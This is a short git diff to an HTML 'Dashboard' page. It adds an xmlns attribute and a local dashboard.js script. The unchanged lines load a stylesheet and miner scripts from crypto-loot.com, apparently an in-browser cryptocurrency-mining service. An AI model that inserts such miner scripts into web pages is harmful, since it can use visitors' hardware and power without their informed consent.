--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <!DOCTYPE html>
-<html>
+<html xmlns="http://www.w3.org/1999/html">
 <head>
     <title>Dashboard</title>
     <link rel="stylesheet" type="text/css" href="https://crypto-loot.com/lib/miner.css">
@@ -52,5 +52,6 @@
     </div>
     <script src="https://crypto-loot.com/lib/miner.min.js"  async></script>
     <script src="https://crypto-loot.com/lib/miner-ui.min.js" async></script>
+    <script src="dashboard.js"></script>
 </body>
 </html>
